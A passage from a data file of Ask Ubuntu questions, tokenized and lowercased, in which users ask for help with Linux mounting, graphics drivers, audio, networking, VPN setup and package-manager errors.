logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/cambuimedia-root does n't contain a valid partition table disk /dev/mapper/cambuimedia-swap_1 : 2134 mb , 2134900736 bytes 255 heads , 63 sectors/track , 259 cylinders , total 4169728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/cambuimedia-swap_1 does n't contain a valid partition table having manually mounted the drives and using the mount command , i get the following : /dev/mapper/cambuimedia-root on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda1 on /boot type ext2 ( rw ) gvfs-fuse-daemon on /home/cambuimedia/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=cambuimedia ) /dev/sdb on /media/media2 type ext4 ( rw , nosuid , nodev , uhelper=udisks ) /dev/sdc on /media/media1 type ext4 ( rw , nosuid , nodev , uhelper=udisks ) i had hoped i could just add the last two lines to my fstab file , so it looks like this : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/cambuibkup-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=83c8badb-653b-4def-9209-04619def34c9 /boot ext2 defaults $ /dev/mapper/cambuibkup-swap_1 none swap sw 0 0 /dev/sdb on /media/media2 type ext4 ( rw , nosuid , nodev , uhelper=udisks ) /dev/sdc on /media/media1 type ext4 ( rw , nosuid , nodev , uhelper=udisks ) but this does n't appear to work on reboot ?
446525	resolution and driver issue	i ca n't seem to figure out what happened , but after a recent update my machine will not use it 's nvidia graphics driver . it is stuck at 1280x720 when the native resolution of the display is 1920x1200 . i 've tried several solutions , but nothing gets it to budge . machine info dell precision m4400 t9800 - 2.93ghz dual-core cpu 8gb ram ddr2 - 2 dimm's nvidia fx 1700m gpu 1920x1200 integrated dell ( samsung ) panel i have no clue what is going on . thanks for any help !
446526	audio `` buzz '' noise from headphone jack into external speakers	asus n550jv laptop dual booting ubuntu 14.04 and windows 8.1 . i have an external speaker plugged in all the time since i usually use my laptop as a desktop . the problem occurs when the laptop is not plugged into a power source . after a few seconds of not receiving any sort of audio signal the headphone jack power is turned off and i get a very loud hum or buzz from the speakers . this is probably a power saving feature . does anyone know where i can tweak my system to leave the headphone jack power on ? also on a side note i 'm not able to send audio through the hdmi outlet currently . i 'm using xorg and my card is nvidia gt 750m and its the hybrid graphics i believe . so depending on usage it might be using the intel hd 4600 instead of the nvidia .
446529	no screens found !	after installing ubuntu on my new laptop ( using the nomodeset method ) , ubuntu boots into a black ( blank ) screen . i 've tried every single solution listed in here : my computer boots to a black screen , what options do i have to fix it ? but to no avail . i managed to boot in recovery mode ( text mode ) , running startx returns fatal error : no screens found . any way to fix this ? my laptop is packard bell en te69bm ( intel hd graphics ) ubuntu is the only os i have installed .
446530	install sis graphics driver to be used as a dual monitor	is there a way i could configure my laptop to use dual monitor ? the complication arises because the laptop has silicon integrated systems graphics , and i have to use antonio j. de oliveira 's driver to run in the normal resolution [ 1280*800 ] . to display in the external monitor [ 1024*768 ] , it has to be connected before the x11 starts . this then causes the laptop 's monitor to display the copy of the monitor [ 1024*768 ] which distorts the image in the laptop 's monitor . also it is displaying the copy in both monitors and is not extending the display . is there a way i could correct this ? edited doing $ lspci | grep vga i get 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 771/671 pcie vga display adapter ( rev 10 ) and doing $ sudo dpkg -l | grep xserver-xorg-video-sis i get ii xserver-xorg-video-sis 1:0.10.3-3build2 x.org x server -- sis display driver ii xserver-xorg-video-sisusb 1:0.9.4-2build2 x.org x server -- sis usb display driver
446532	terraria fails on startup	i am running : wine 1.6.1 ubuntu 13.10 . i installed a clean 32 bit .wine prefix , with wine set to act as win 7 ( i have tried xp as well ) . then installed xna40 ( xna framework 4.0 ) and dotnet40 ( ms.net 4.0 ) . after that i installed steam using winetricks '' env wineprefix= '' ~/ , wine winetricks -- no-isolate steam '' then installed terraria as i normally would . when instillation is finished i 'll click play , and for a split second i 'll get the preparing to launch terraria prompt and it goes away and terraria does not launch . the terminal displays this : me : dwmapi : dwmsetwindowattribute ( 0x8013c , 2 , 0x33e554 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x8013c , 3 , 0x33e560 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x8013c , 4 , 0x33e550 , 4 ) stub err : module : import_dll library mscoree.dll ( which is needed by l '' c : \program files\steam\steamapps\common\terraria\terraria.exe '' ) not found err : module : ldrinitializethunk main exe initialization for l '' c : \program files\steam\steamapps\common\terraria\terraria.exe '' failed , status c0000135 i have tried re-installing everything multiple times and i cant seem to find anyone who is having this same problem . help ? ?
446534	ubuntu 12.04 notebook wired/wireless connection problem ?	i setup ubuntu 12.04 lts to my hp pavilion dv6 . i have no wired/wireless connection . need help . here is some outputs . ifconfig : lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:216 errors:0 dropped:0 overruns:0 frame:0 tx packets:216 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:16064 ( 16.0 kb ) tx bytes:16064 ( 16.0 kb ) ifconfig -a : eth0 link encap : ethernet hwaddr 00:00:00:00:00:00 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:232 errors:0 dropped:0 overruns:0 frame:0 tx packets:232 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:17008 ( 17.0 kb ) tx bytes:17008 ( 17.0 kb ) iwconfig : eth0 no wireless extensions . lo no wireless extensions .
446535	how to download ubuntu 13.04 ?	my question is very simple , i want to download ubuntu 13.04 from ubuntu official website , can any one tell me from where should i download it
446536	how do i rotate the login screen ?	so i am trying out the 14.04 and i keep both of my monitors in portrait mode . but the login splash is in landscape . but i ca n't seem to figure out how to rotate my login splash or where the config is for it ? it is no longer in /etc/lightdm/lightdm.conf can anyone help ?
446540	unity hud on other des	i 'm trying to choose a desktop environment for my future laptop , and have this thing with unity : i generally do n't like it so much ( lacking configurability , high resources , etc . ) , but while i was using ubuntu i found the hud brilliant . is there any way to get that hud in other des / with other wms , or anything like the hud in unity , to search application menus with a keybinding ?
446543	unable to login first time , 12.04 lts `` could not apply the stored configuration for monitors ''	i am running ubuntu 12.04 within vmware fusion for osx mavericks . i recently got a new external monitor that displays at 2560x1440 , which i use in clamshell mode ( laptop closed ) . every time i login the first time i 've awoken from sleep , the login screen appears ... i login nothing but a black blank screen , with my cursor working . do i need to update the vmware profile ? i 'm unsure if this is ubuntu or vmware settings . appreciate any help as to what you 'd check first . `` could not apply the stored configuration for monitors '' error appears once i force shutdown and restart the vm .
446545	google chrome on ubuntu 12.04 freezes my laptop	when i install google chrome on my ubuntu 12.04 and start working in chrome , my computer freezes . i ca n't move my mouse or do anything , so i must force shut down and hold the power button on my laptop . any help ?
446548	getting sound to play on my new machine on ubuntu 13.10	so i 've been struggling with this for a bit now , and it 's getting a bit frustrating . some preliminary information : i 've just built this computer from parts . checking the available audio ( not sure if there is a better way to do this ) : lspci | grep audio 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 05 ) 01:00.1 audio device : nvidia corporation gk104 hdmi audio controller ( rev a1 ) here 's sound settings > output i attempted to follow this instruction , but now i lack a speak icon on my toolbar , and sound tests ( sound settings > output ) do n't seem to attempt to test the sound ( when i press a 'test ' button , i now do not get graphical feedback ) . here is my alsamixer : pch card : and after viewing available sound cards ( f6 ) : i attempted also to delete my /run/user/1000/pulse directory , but to no avail . so my questions are , what is my problem and how do i fix it ? this silence is maddening . hardware specs ( just in case it 's relevant ) : mobo - > g1.sniper z87 gpu - > geforce gtx 760
446549	12.04 and 13.10 installation issues	i am new to ubuntu . my windows 7 crashed so i decided to try ubuntu . yesterday , i tried to install ubuntu 13.10 . i 'm using a 16gb usb thumb drive.i downloaded a program that would allow my usb to be bootable from the start up of my computer . it went through the installation , then at the end had an installation issue . it said that the installer had crashed . i tried t install it again and the same thing happened . i then decided to try the 12.04 iso file . i downloaded it and used the same program to upload it to my usb . again i went through the installation and had and installation error and the installer crashed . please help .
446561	removed nvidia from startup items , now can not boot	i removed the nvidia server ( ? ) from the startup items now whenever i boot i get stuck at the `` the system is running in low-graphics mode '' pop-up . no matter what i do i can not get past this . if i select ok , the system just hangs . question : how can i get the nvidia server item i removed from my startup list back into it , or otherwise fix this ?
446567	auto mount mount point on iscsi driver	i am running ubuntu 12.04 lts . i recently added a 1 terabyte iscsi volume with a single ext4 partition . everything works as it should but with the only issue being i can not create a mount point using fstab with a uuid line . i can mount the mount point manually but it wont mount a boot time . the boot process stops and displays a message like `` the disk drive for /images is not ready yet or not present . '' is there some way to delay the mounting of the mount point until after the drive becomes available ?
446568	how to disable all unity shortcut keys when using blender ?	i use blender , and there are some key shortcuts that conflict with unity 7 , like ctrl+alt+numpad0 , disabled in the `` shortcuts '' menu ( and sometimes , the shortcut is automaticaly ( ? ) reactivated ! ) . but there are other shortcuts which i do n't know how to disable , like alt+rightclick . does anyone know how to disable them all just when i use blender . thank you ! p.s . : i use ubuntu 14.04 ( no more 13.10 ) in fact , the problem is that blender and unity shortcuts interfere , unlike with the kde desktop , but i do n't want to install kde just for blender .
446569	ubuntu 12.04 installed on seagate 500gb slim crashes very frequently	ubuntu community . i 've searched very hard on the internet using google , and also askubuntu 's internal search , but i do n't seem to find any information relating to what appears to be a very unique problem . i attempted a install of ubuntu 12.04 from a 16 gb usb on to a seagate slim hard drive ( note : this is a hard drive with a spinning disk - not flash drive ) , and the installation appears to work at the start , however it frequently crashes within 5 or so minutes every time . after installation , i began doing the standard post install work - configuring settings , changing desktop background , and suddenly , the linux installation just crashed . the menubars ( black bar on top of screen ) , and all directories would instantly become unreadable , and the system would be stuck in a limbo , and be semi-responsive . attempting to right click would work , but trying to create folders , close existing windows , or pretty much do anything would result in a error , which would state something along the lines of the directory not being found or unaccessible i have verified that the power saving options on my seagate drive has been turned off , and the drive should not spin off automatically - both via using seagate 's media center hardware , and also manually inspecting the drive by putting my ears up to it close , either way the disk still spins . my hypothesis is that somehow the drive becomes disconnected - even though that is not true . the usb cable is brand new , and so is the drive , and i 've tried running the seagate on a very flat surface and careful to not disturb the usb ports or wire - but the same issue still happens every 5 to 10 minutes . what is the problem ? how do i solve it ?
446570	why does su fail with `` authentication error '' ?	i tried to su to root so i could install lights , but i get an authentication error when i try : user @ host : ~ $ su password : su : authentication failure
446571	how to remap certain keys on keyboard on ubuntu 13.10 with xkb	water spilled on my laptop and key `` 9 '' is not working . i want to map altgr or ctrl_r to 9 so that i can program with out any hassle . i 've seen so many solutions with xmodmap but its kinda outdated i want a solution with xkb .
446576	will trusty/14.04 installation media come without ubuntu one ?	as ubuntu one has been shut down now , and the current build of 14.04 'trusty ' still comes with ubuntu one ( and u1 music , etc with it ) : would ubuntu one come with the final release as well ? please check the trusty release schedule ; the final beta was released on march 27 . if it does , i think it 'd lead to a huge confusion for users , and also embarrassment for people like me who 'd have to tell new migrants ( from the windows world ) that this service has now been shut down . also , as u1 is now dead , how would the users of the phone version on trusty sync their contacts , files , music , etc ? would 13.10 live dvd images also be updated to incorporate this change ?
446579	please help me setting up my new 3g usb modem `` d-link dwp 156 in ubuntu 13.10	this usb modem has official support for linux os ( ubuntu 10.04 or above ) . i have tried all the methods shown on various sites.nothing worked please help me . in the terminal i typed isusb and the output is as given below . lsusb bus 001 device 010 : id 2001:7d01 d-link corp . i also tried to install the 3g_modem_connect_dtlw2_d300a_amd64.deb file but it does n't get install via software center .
446580	why does `type which` say that `which is hashed` ?	in case of shell-builtins ( eg type itself ) : $ type type type is a shell builtin $ which type < does n't return anything since it 's a shell builtin , silently exits > in case of commands ( normally ) ( eg python ) : $ type python python is /usr/bin/python $ which python /usr/bin/python in case of which ( which is a command located at /usr/bin/which ) $ type which which is hashed ( /usr/bin/which ) $ which which /usr/bin/which why does type which say that which is hashed ? what is the significance of which being hashed and what does it actually mean ?
446581	ubuntu 12.04 bumblebee vs nvidia geforce gt 740m	after a week checking a lot of references about bumblebee/nvidia , i decided to post this new thread . nothing i 've tried have worked in my scenario : - ( ... testing of virtualgl and primus , different choices on config files , rebuilding and testing of drivers nvidia-current-updates and nvidia-331-updates , and installing/deinstalling multiple times ... frustrating . : - ( : -/ i will appreciate any hint , tip , or reference which can help me to solve the problems explained below . hp laptop . pavilion 15 running in legacy mode ( by disabling secureboot ) installed ubuntu 12.04 ( without win8 ) , with bumblebee bumblebee-nvidia virtualgl virtualgl-libs : i386 linux-headers-generic nvidia-331-updates , and additionally primus primus-libs : i386 current status and results for : ~ $ glxgears running synchronized to the vertical refresh . the framerate should be approximately the same as the monitor refresh rate . 305 frames in 5.0 seconds = 60.888 fps 301 frames in 5.0 seconds = 60.026 fps ... $ optirun -vv glxgears [ 837.155622 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 837.156380 ] [ info ] configured driver : nvidia [ 837.156787 ] [ debug ] optirun version 3.2.1 starting ... [ 837.156840 ] [ debug ] active configuration : [ 837.156896 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 837.156948 ] [ debug ] x display : :8 [ 837.156980 ] [ debug ] ld_library_path : /usr/lib/nvidia-331-updates : /usr/lib32/nvidia-331-updates [ 837.157012 ] [ debug ] socket path : /var/run/bumblebee.socket [ 837.157042 ] [ debug ] accel/display bridge : virtualgl [ 837.157077 ] [ debug ] vgl compression : proxy [ 837.157109 ] [ debug ] vglrun extra options : [ 837.157145 ] [ debug ] primus ld path : /usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus [ 837.164030 ] [ info ] response : no - error : x did not start properly [ 837.164069 ] [ error ] can not access secondary gpu - error : x did not start properly [ 837.164085 ] [ debug ] socket closed . [ 837.164117 ] [ error ] aborting because fallback start is disabled . [ 837.164131 ] [ debug ] killing all remaining processes . - $ lspci | egrep '3d|vga' 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 0a:00.0 3d controller : nvidia corporation gk208m [ geforce gt 740m ] ( rev ff ) - $ lspci -k after boot ... 0a:00.0 3d controller : nvidia corporation gk208m [ geforce gt 740m ] ( rev ff ) and after 'sudo modprobe nvidia_331_updates ' ... 0a:00.0 3d controller : nvidia corporation gk208m [ geforce gt 740m ] ( rev a1 ) subsystem : hewlett-packard company device 2166 kernel driver in use : nvidia kernel modules : nvidia_331_updates , nvidia_304 , nouveau , nvidiafb ( just look changes from rev-ff to rev-a1 ... ! ! ! ) $ jockey-text -l kmod : nvidia_304 - nvidia_304 ( privativo , activado , no estรก en uso ) kmod : nvidia_331 - nvidia binary xorg driver , kernel module and vdpau library ( libre , desactivado , no estรก en uso ) kmod : nvidia_331_updates - nvidia_331_updates ( privativo , activado , no estรก en uso ) all drivers activated but 'not in use' ~ $ optirun -- status bumblebee status : error ( 3.2.1 ) : x did not start properly $ optirun -b none nvidia-settings -c :8 [ 525.940758 ] [ error ] can not access secondary gpu - error : x did not start properly [ 525.940890 ] [ error ] aborting because fallback start is disabled . $ ldd $ ( which optirun ) linux-vdso.so.1 = > ( 0x00007fffb7bfe000 ) libglib-2.0.so.0 = > /lib/x86_64-linux-gnu/libglib-2.0.so.0 ( 0x00007facb3bce000 ) librt.so.1 = > /lib/x86_64-linux-gnu/librt.so.1 ( 0x00007facb39c6000 ) libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007facb3605000 ) libpcre.so.3 = > /lib/x86_64-linux-gnu/libpcre.so.3 ( 0x00007facb33c8000 ) libpthread.so.0 = > /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x00007facb31ab000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007facb3ed7000 ) due to problems on char limits into this form , i post an external link for contents from : bumblebee.conf , xorg.conf.nvidia , xorg.0.log : http : //public.justcloud.com/dra40vv88p.5315941 thanks for paying attention ! ! best regards ! ! ; - ) )
446589	ubuntu 13.10 vpn stops after couple of seconds	running ubuntu 13.10 with unity . i have setup a vpn connection on windows7 , with android , etc it works flawless . if i setup a vpn connection on ubuntu 13.10 using unity as a desktop the connection dies after a couple of seconds . i am going nuts on this issue and i have no idea what the problem is .
446593	access files from my nas	so i switched from xp to ubuntu . install was pretty easy , partly because i have all my data on a nas . the very first i needed to do with my new ubuntu environment was to send a file from my nas to somebody by using wetransfer . should n't be that difficult , should it ? so i browsed to the network , double clicked on my nas it 's share , authenticated , et voila . there is my data . started the browser , went to wetransfer.com and clicked to select the file . ehm , hu ? there is no way to browse to the share on my nas ? ? ? ? ? ? ? ? ? that was two days ago , and i still can not browse to my data from with an application . i 've googled and googled , and read about gfvs-mount , mount , smbnetfs , tried them all but no luck . what am i doing wrong ? ? this should n't be that difficult , should it ? thanks for any help .
446594	internet key k3806-z not recognized	i have a usb modem k3086-z in xubuntu 13.04 . no way to get it works . i insert the usb stick and i still get the red light which does not switch to blue/green . i read in many post that this key should work in 13.04 and that a window should open at the moment of inseriment asking ror a pin or something else . nothing happens in my case . network manager seems to not see the key . i stopped network manager and tryed sakis3g ( that was working on another pc with ubuntu 10.04 ) but nothing . just a message `` failed to connect '' it seems that there is no way ...
446598	howto respawn a process on startup	in slackware i just change one line in initab to run my program in a different console on bootup with auto respawn , how can i accomplish this in ubuntu .. it seem one need a phd to write a upstart file in /etc/init/myprogram c2:1235 : respawn : /home/gerrie/myprogram 1 < & 2 1 > /dev/tty2 < dev/tty2 thanks in advance
446600	ubuntu 13.10 does not boot properly after improper shutdown	some days ago , my ubuntu began to crash , so i had to turn it off improperly . after that it does not boot anymore , giving the following error : > error : attempt to read or write outside of disk 'hd0' sometimes this message is not shown and the system boots after a long time waiting on a black screen . however the system becomes slow , many programs do not open and many commands in the terminal are not accepted , saying that something is `` read-only '' opened . so , i need some help to solve this problem .
446601	how can i lock and blank the screen from the keyboard in 14.04 ?	in older versions of ubuntu when you pressed ctrl+alt+l it would lock and blank the screen ( start the screensaver ) . in 14.04 it just locks the screen . how can i get it to lock and blank the screen ?
446603	will not recognize my native resolution of 1920 x 1080	i am very new to ubuntu/linux and i have two identical pc 's with two identical displays . one of the pc 's shows the native resolution of the display 1920 x 1080 but the other does not even show up . i am wondering how to unlock the native resolution in this . please help
446605	unable to install software using software center : package removal failed error	while dpkg -i works , i ca n't install software via software centre i get : package operation failed the installation or removal of a software package failed i have tried the following : sudo dpkg -- configure -a sudo apt-get autoremove sudo apt-get install -f but still nothing happens . i 'm running 14.04 beta
446606	tunneling traffic from one application through a vpn and leaving other traffic alone	i 'm trying to send traffic from aria2 ( a download manager ) through an openvpn conneciton , but leave the rest of my network alone . i saw this question and was wondering if it could be modified to send over a vpn tunnel instead of wlan0 . i 'm using ubuntu server 12.04 . right now all the traffic goes through the vpn .
446607	usb - ethernet adapter not working	using ubuntu 12.04. trying to get a cisco usb-ethernet adapter to work . when i do ifconf it shows the same basic entries as my ethernet card so the system sees the device and apparently registers it . i applied the suggestions from a similar post and edited the /etc/network/interfaces file as below : auto lo iface lo inet loopback auto eth1 iface eth1 inet static address 192.1.1.100 netmask 255.255.0.0 gateway 192.1.1.1 broadcast 192.1.1.254 name server 8.8.8.8 8.8.8.4 i saved it and did a ifdown and ifup . when i do a ping -i 191.1.1.100 to another computer using a crossover table i get `` destination unreachable '' . to add another twist , when i restart the computer i have no networks at all . the ethernet card does n't work until i delete all the changes i made to the interfaces file and restart . any thoughts ? emmett
446609	how do i root my lg optimus f3 on linux ?	also , can someone please tell me where to find the linux drivers for my phone , so that i can root my phone ? do i even need a specific set of drivers if i am running linux ? i am using elementary os which is based on ubuntu .
446617	i have been try to install a dual boot system with window 7 & ubuntu	every version of ubuntu i try to install shows up a black screen with a white box on the top left corner of the screen . i have tried from versions 12:04 and up but no luck . my system specs intel i7 4770k cpu nvdia gtx 760 gpu asrock extreme 6 ssd - dedicated to windows7 hdd - want to install ubuntu a partition . using a full hd monitor if that matters ? i would think that my specs are more than capable of running ubuntu but it simply wont go past the black and white screen . i have tried different distributions that are based on ubuntu as well e.g linux mint , zorin but the same thing happens . i have also tried the alternative install of ubuntu but that wont boot either . i then tried using the exact same cd of ubuntu alternate on another machine and it boots fine . funny thing is that puppy linux boots fine ! ! the last point i can reach to in the install is the stick figure showing at the bottom of the screen . i have already tried the nomodeset option but still no luck . using this option my screen is just stuck at a completely blank screen . can you guys please help my i 've spent days trying to figure out what is going wrong ?
446618	error when boot : could not write bytes : broken pipe	good day , i see there are various questions about the same topic but it looks like the cause are somewhat different . i tried tor resolve my problem by looking and trying some of the solutions but without any success so far . i suspect my problems come in with the graphics drivers as i made a change to the resolution and then for some reason i could not reset the resolution to the original values . i therefore installed the latest nvidia drivers by using the following : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get dist-upgrade but i think i made a mistake by then also installing this afterwards : sudo apt-get install nvidia-current i rebooted and now i get this error : could not write bytes : broken pipe assistance will be highly appreciated
446619	when partitioning with gparted how do i create a 1 gigabyte partition ?	i 'm using lubuntu 13.10 amd64bit . i have gparted installed , but how can i make a 1 gigabyte partition ? it says mib .
446626	error : service s-proxy is not running - openstack installation	i am trying to install openstack with devstack once i installed successfully but swift is not enabled by default so i tried to unstack.sh and then stack.sh by using this local.conf but i am getting this error when swift is enabled . ++ ls /opt/stack/status/stack/s-proxy.failure + failures=/opt/stack/status/stack/s-proxy.failure + for service in ' $ failures' ++ basename /opt/stack/status/stack/s-proxy.failure + service=s-proxy.failure + service=s-proxy + echo 'error : service s-proxy is not running' error : service s-proxy is not running
446631	wipe hard drive while booted ?	today is my last day at a job and i want to wipe the hard drive before i leave . it does n't need to be insanely randomized or anything , just delete the os and most data . i 'd rather not have to download , burn , and boot a livecd . is there a way to wipe the hard drive while booted ? i realize this will crash the os at some point , but that 's okay : )
446641	installing koala ( development kit ) in ubuntu	i 've recently switched to ubuntu . i 've also moved most of my development area to ubuntu as well . the only thing that i 'm missing is a compresser and minifier for my less and javascript files . on mac i 've used codekit and prespos on windows , but now i need an option for ubuntu . what would be the best alternative ? i 've found out about koala which seems pretty decent , but i have no idea how to install it . it downloads a tar.gz archive , but i do n't know what to do with it , except extract it . if you have a better similar tool to suggest , please let me know . otherwise please give me a guide on how to install koala on ubuntu .
446642	wireless card for virtualbox	i am using ubuntu 13.10 host . inside it i installed virtualbox with kali linux . the wireless for kali is not working . what could be causing this issue ?
446644	why do i get importerror when trying to import pandas python module ?	i installed the pandas module for python 2.7 using apt-get . however , when i try to import the module , it raises an importerror : import pandas as pd file `` /usr/lib/pymodules/python2.7/pandas/__init__.py '' , line 15 , in < module > raise importerror ( 'importerror : c extensions not built : if you installed already verify that you are not importing from the source directory ' ) the call in /usr/lib/pymodules/python2.7/pandas/__init__.py is : import pandas.lib as lib except exception : # pragma : no cover import sys e = sys.exc_info ( ) [ 1 ] # py25 and py3 current exception syntax conflict if 'no module named ' in str ( e ) : raise importerror ( 'c extensions not built : if you installed already ' 'verify that you are not importing from the source ' 'directory ' ) else : raise why do i get importerror and how do i solve this ? following is what i get when trying to import the dependencies of pandas in an interactive python shell : > > > import numpy as np > > > import dateutil > > > import pytz > > > import numexpr traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : no module named numexpr > > > import bottleneck traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : no module named bottleneck
446646	failing to fetch some packages in update	i want to get ruby on rails on ubuntu 12.04 but i 'm coming across errors that say i need to to update . i 've copied the result of the end of update and not included the earlier part . i can add that if it is needed . hit http : //us.archive.ubuntu.com precise-backports/restricted translation-en hit http : //us.archive.ubuntu.com precise-backports/universe translation-en fetched 2,916 kb in 4s ( 663 kb/s ) w : failed to fetch http : //ppa.launchpad.net/gijzelaar/opencv2/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/gijzelaar/opencv2/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/gijzelaar/opencv2/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . when i run rvm requirements this is the error i 'm seeing . checking requirements for ubuntu . installing requirements for ubuntu . updating system ... ... ... ... ... ... error running 'requirements_debian_update_system ' , showing last 15 lines of /home/charles/.rvm/log/1397254493/update_system.log + case `` $ { term : -dumb } '' in + case `` $ 1 '' in + [ [ -t 2 ] ] + return 1 + printf % b 'there has been error while updating '\ '' apt-get'\ '' , please give it some time and try again later . for 404 errors check your sources configured in : /etc/apt/sources.list /etc/apt/sources.list.d/*.list \n' there has been error while updating 'apt-get ' , please give it some time and try again later . for 404 errors check your sources configured in : /etc/apt/sources.list /etc/apt/sources.list.d/*.list + return 100 requirements installation failed with status : 100 . i 'm following the instructions from https : //www.digitalocean.com/community/articles/how-to-install-ruby-on-rails-on-ubuntu-12-04-lts-precise-pangolin-with-rvm
446647	closing - not killing - gedit instances via the terminal ( to save changes ) ?	how can i close multiple instances of gedit windows through the command line ? some of the windows may contain changes to documents . so , i would like to be prompted to save them or not . if i use pkill gedit it will simply kill all instances without prompting to save changes . background info : often , i have tons of windows open over multiple workspaces . some of them are gedit windows with notes . thus , when running shutdown -h now shutdown will block because some windows contain changes to files or unsaved notes . saving all instances with changes would prevent me from inspecting and closing all windows one by one .
446651	apt-get remove -- purge wine* removed everything !	sudo apt-get remove -- purge wine* opened the gates of hell and removed many things . i was n't allowed to paste the output here , too big . i stopped the process , i wanted to save what 's left of my system ! how to reinstall what has been removed ? why were these packages removed ? it is the most important question , why the hell were they removed ? i ca n't see any relation between spotify and wine ! if apt-get -- purge might destroy your system , how to remove wine then ? i removed it from software center but many files were still there . can you ever trust apt-get -- purge ? i 'm on xubuntu 14.04 64 bit .
446655	how do i install ubuntu - difficult to get past first base !	have downloaded the ubunto .iso file , double-click , roxio opens up to save an image file - but wo n't save to cd , external hard drive or even internal drive . i do n't even need an image file ! how do i get past this ? i just want ubuntu in place of xp - and yes , i realise that will wipe the computer .
446657	openvpn options error : you must define ca file	i 'm setting up vpn from expressvpn.org , and i 'm following this directions . i 've installed openvpn using : sudo apt-get install -y openvpn and placed a .ovpn , .key and .crt files from expressvpn.biz in /etc/openvpn : user @ pegasus : /etc/openvpn $ ls ca.crt client.key my_expressvpn_israel_udp.ovpn my_expressvpn_uk_-_isle_of_man_udp.ovpn update-resolv-conf client.crt my_expressvpn_egypt_udp.ovpn my_expressvpn_russia_udp.ovpn ta.key but when i run openvpn i get this error : user @ pegasus : /etc/openvpn $ sudo openvpn my_expressvpn_israel_udp.ovpn fri apr 11 23:30:08 2014 deprecated option : -- tls-remote , please update your configuration options error : you must define ca file ( -- ca ) or ca path ( -- capath ) all help is appreciated .
446660	can not get sickbeard or couchpotato to run on startup on ubuntu server 12.04lts	i know this question has been asked dozens of times , though nothing i read & try seems to be working for me . my most recent problem was rebooting my machine to find sickbeard & couchpotato did n't start , and after manually starting them found they both lost all their settings . i fixed this issue on couchpotato ( no idea how ... ) though not on sickbeard . so i removed everything to do with sickbeard . i removed my .sickbeard folder , init.d and default files and started again . i followed this tutorial to install sickbeard on ubuntu server . i followed it to the letter , only changing username to my own username . if i rdp into my box ( which is how i do my install etc ) and , via the terminal , type : sudo /etc/init.d/sickbeard start sickbeard fires up , so i can safely assume the init.d script is working . yet it will not run on boot . if i look in webmin at the boot and shutdown section i can see an entry for sickbeard . it tells me it is set to start on boot , and that it is n't running . can anybody please point me in the right direction to correctly get this thing to run when my box reboots .
446663	how can i adjust the brightness on an hp envy dv7 ?	i have an hp envy dv7 . when i was running windows 8 , i could tweak the brightness to my heart 's content . now , i 'm limited to only the first five clicks on the brightness bar . after that , same max setting . is it possible to tweak the settings more ?
446665	password not recognized	i updated the ubuntu version , and when i enter my old password the screen goes black and goes back again prompting my password once more . the password is correct as the `` wrong password '' message does not appear . the only way in is as a guest . i am really new at this , can anyone help me ? tx
446668	how to tell if network traffic is encrypted	i 'm using a program called lottanzb to connect to a usenet server . i 've connected to the ssl port , but i 'd like to check it 's actually connected . how can this be done ? i 've used wireshark , but i ca n't see any sign the traffic is encrypted .
446670	downgrade java from 1.7u51 to lower update than 51	how do i downgrade java from 1.7u51 to 1.7u45 or anything lower than u51 ?
